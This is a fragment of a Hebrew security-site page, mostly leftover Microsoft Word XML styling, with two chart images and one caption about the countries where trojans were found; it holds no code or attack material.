<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE"><img class="aligncenter size-full wp-image-1026" title="example" src="http://www.hacking.org.il/wp-content/uploads/2009/05/gr3.jpg" alt="example" width="630" height="583" /></span></p>
<p class="MsoNormal" dir="rtl">
<p class="MsoNormal" dir="rtl"><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves /> <w:TrackFormatting /> <w:PunctuationKerning /> <w:ValidateAgainstSchemas /> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF /> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>HE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables /> <w:SnapToGridInCell /> <w:WrapTextWithPunct /> <w:UseAsianBreakRules /> <w:DontGrowAutofit /> <w:SplitPgBreakAndParaMark /> <w:DontVertAlignCellWithSp /> <w:DontBreakConstrainedForcedTables /> <w:DontVertAlignInTxbx /> <w:Word11KerningPairs /> <w:CachedColBalance /> </w:Compatibility> <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel> <m:mathPr> <m:mathFont m:val="Cambria Math" /> <m:brkBin m:val="before" /> <m:brkBinSub m:val="&#45;-" /> <m:smallFrac m:val="off" /> <m:dispDef /> <m:lMargin m:val="0" /> <m:rMargin m:val="0" /> <m:defJc m:val="centerGroup" /> <m:wrapIndent m:val="1440" /> <m:intLim m:val="subSup" /> <m:naryLim m:val="undOvr" /> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"   DefSemiHidden="true" DefQFormat="false" DefPriority="99"   LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Normal" /> <w:LsdException Locked="false" Priority="9" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="heading 1" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9" /> <w:LsdException Locked="false" Priority="39" Name="toc 1" /> <w:LsdException Locked="false" Priority="39" Name="toc 2" /> <w:LsdException Locked="false" Priority="39" Name="toc 3" /> <w:LsdException Locked="false" Priority="39" Name="toc 4" /> <w:LsdException Locked="false" Priority="39" Name="toc 5" /> <w:LsdException Locked="false" Priority="39" Name="toc 6" /> <w:LsdException Locked="false" Priority="39" Name="toc 7" /> <w:LsdException Locked="false" Priority="39" Name="toc 8" /> <w:LsdException Locked="false" Priority="39" Name="toc 9" /> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption" /> <w:LsdException Locked="false" Priority="10" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Title" /> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font" /> <w:LsdException Locked="false" Priority="11" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtitle" /> <w:LsdException Locked="false" Priority="22" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Strong" /> <w:LsdException Locked="false" Priority="20" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Emphasis" /> <w:LsdException Locked="false" Priority="59" SemiHidden="false"    UnhideWhenUsed="false" Name="Table Grid" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text" /> <w:LsdException Locked="false" Priority="1" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="No Spacing" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 1" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 1" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 1" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 1" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision" /> <w:LsdException Locked="false" Priority="34" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="List Paragraph" /> <w:LsdException Locked="false" Priority="29" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Quote" /> <w:LsdException Locked="false" Priority="30" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Quote" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 1" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 1" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 1" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 1" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 1" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 2" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 2" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 2" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 2" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 2" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 2" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 2" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 2" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 3" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 3" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 3" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 3" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 3" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 3" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 3" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 3" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 3" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 4" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 4" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 4" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 4" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 4" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 4" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 4" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 4" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 4" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 5" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 5" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 5" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 5" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 5" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 5" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 5" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 5" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 5" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 6" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 6" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 6" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 6" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 6" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 6" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 6" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 6" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 6" /> <w:LsdException Locked="false" Priority="19" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis" /> <w:LsdException Locked="false" Priority="21" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis" /> <w:LsdException Locked="false" Priority="31" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference" /> <w:LsdException Locked="false" Priority="32" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Reference" /> <w:LsdException Locked="false" Priority="33" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Book Title" /> <w:LsdException Locked="false" Priority="37" Name="Bibliography" /> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading" /> </w:LatentStyles> </xml><![endif]--> <!--[if gte mso 10]><br />
<mce:style><!   /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-priority:99; 	mso-style-qformat:yes; 	mso-style-parent:""; 	mso-padding-alt:0cm 5.4pt 0cm 5.4pt; 	mso-para-margin:0cm; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Calibri","sans-serif";} --></p>
<p><!--[endif]--></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">מדינות בהם נמצאו סוסים:</span></p>
<p class="MsoNormal" dir="rtl">
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE"><img class="aligncenter size-full wp-image-1027" title="מדינות" src="http://www.hacking.org.il/wp-content/uploads/2009/05/gr4.jpg" alt="מדינות" width="658" height="320" /></span></p>
<p class="MsoNormal" dir="rtl">
<p class="MsoNormal" dir="rtl"><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves /> <w:TrackFormatting /> <w:PunctuationKerning /> <w:ValidateAgainstSchemas /> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF /> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>HE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables /> <w:SnapToGridInCell /> <w:WrapTextWithPunct /> <w:UseAsianBreakRules /> <w:DontGrowAutofit /> <w:SplitPgBreakAndParaMark /> <w:DontVertAlignCellWithSp /> <w:DontBreakConstrainedForcedTables /> <w:DontVertAlignInTxbx /> <w:Word11KerningPairs /> <w:CachedColBalance /> </w:Compatibility> <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel> <m:mathPr> <m:mathFont m:val="Cambria Math" /> <m:brkBin m:val="before" /> <m:brkBinSub m:val="&#45;-" /> <m:smallFrac m:val="off" /> <m:dispDef /> <m:lMargin m:val="0" /> <m:rMargin m:val="0" /> <m:defJc m:val="centerGroup" /> <m:wrapIndent m:val="1440" /> <m:intLim m:val="subSup" /> <m:naryLim m:val="undOvr" /> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"   DefSemiHidden="true" DefQFormat="false" DefPriority="99"   LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Normal" /> <w:LsdException Locked="false" Priority="9" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="heading 1" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9" /> <w:LsdException Locked="false" Priority="39" Name="toc 1" /> <w:LsdException Locked="false" Priority="39" Name="toc 2" /> <w:LsdException Locked="false" Priority="39" Name="toc 3" /> <w:LsdException Locked="false" Priority="39" Name="toc 4" /> <w:LsdException Locked="false" Priority="39" Name="toc 5" /> <w:LsdException Locked="false" Priority="39" Name="toc 6" /> <w:LsdException Locked="false" Priority="39" Name="toc 7" /> <w:LsdException Locked="false" Priority="39" Name="toc 8" /> <w:LsdException Locked="false" Priority="39" Name="toc 9" /> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption" /> <w:LsdException Locked="false" Priority="10" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Title" /> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font" /> <w:LsdException Locked="false" Priority="11" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtitle" /> <w:LsdException Locked="false" Priority="22" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Strong" /> <w:LsdException Locked="false" Priority="20" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Emphasis" /> <w:LsdException Locked="false" Priority="59" SemiHidden="false"    UnhideWhenUsed="false" Name="Table Grid" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text" /> <w:LsdException Locked="false" Priority="1" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="No Spacing" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 1" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 1" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 1" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 1" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision" /> <w:LsdException Locked="false" Priority="34" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="List Paragraph" /> <w:LsdException Locked="false" Priority="29" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Quote" /> <w:LsdException Locked="false" Priority="30" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Quote" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 1" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 1" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 1" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 1" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 1" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 2" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 2" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 2" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 2" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 2" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 2" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 2" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 2" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 3" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 3" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 3" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 3" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 3" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 3" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 3" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 3" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 3" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 4" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 4" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 4" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 4" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 4" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" 